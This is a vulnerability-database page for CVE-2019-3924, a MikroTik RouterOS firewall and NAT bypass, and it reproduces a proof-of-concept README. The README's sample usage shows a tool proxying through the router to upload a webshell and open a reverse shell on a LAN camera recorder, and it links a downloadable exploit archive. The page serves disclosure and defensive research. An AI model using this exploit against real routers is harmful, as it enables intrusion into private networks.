Vulners
Lucene search
MikroTik RouterOS 6.43.12 (stable) 6.42.12 (long-term) - Firewall and NAT Bypass
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass | 21 Feb 201900:00 | – | zdt |
 | The vulnerability of the RouterOS operating system, related to errors in privilege management, allows a hacker to circumvent network firewall policies. | 12 Mar 201900:00 | – | bdu_fstec |
 | CVE-2019-3924 | 21 Feb 201900:00 | – | circl |
 | MikroTik RouterOS Unauthenticated Firewall & NAT Bypass Vulnerability | 21 Feb 201900:00 | – | cnvd |
 | CVE-2019-3924 | 20 Feb 201920:00 | – | cve |
 | CVE-2019-3924 | 20 Feb 201920:00 | – | cvelist |
 | MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass | 21 Feb 201900:00 | – | exploitdb |
 | MikroTik RouterOS Unauthenticated Intermediary | 8 Apr 201900:00 | – | nessus |
| MikroTik RouterOS Confused Deputy (CVE-2019-3924) | 27 Feb 202400:00 | – | nessus |
 | CVE-2019-3924 | 20 Feb 201920:29 | – | nvd |
10
# CVE-2019-3924
A remote, unauthenticated attacker can proxy traffic through RouterOS via probes sent to the agent binary. This PoC demonstrates how to exploit a LAN host from the WAN. A video demonstrating the attack can be found here:
* https://www.youtube.com/watch?v=CxyOtsNVgFg
A Tenable Research Advisory for the vulnerability can be found here:
* https://www.tenable.com/security/research/tra-2019-07
## Compilation
This code was tested on Ubuntu 18.04. There is a dependency on boost, gtest, and cmake. Simply install them like so:
```sh
sudo apt install libboost-dev cmake
```
To compile simply do the following:
```sh
cd routeros/poc/cve_2019_3924/
mkdir build
cd build
cmake ..
```
## Sample Usage
```sh
albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$ ./nvr_rev_shell --proxy_ip 192.168.1.70 --proxy_port 8291 --target_ip 10.0.0.252 --target_port 80 --listening_ip 192.168.1.7 --listening_port 1270
[!] Running in exploitation mode
[+] Attempting to connect to a MikroTik router at 192.168.1.70:8291
[+] Connected!
[+] Looking for a NUUO NVR at 10.0.0.252:80
[+] Found a NUUO NVR!
[+] Uploading a webshell
[+] Executing a reverse shell to 192.168.1.7:1270
[+] Done!
albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$
```
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46444.zipData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Feb 2019 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.15697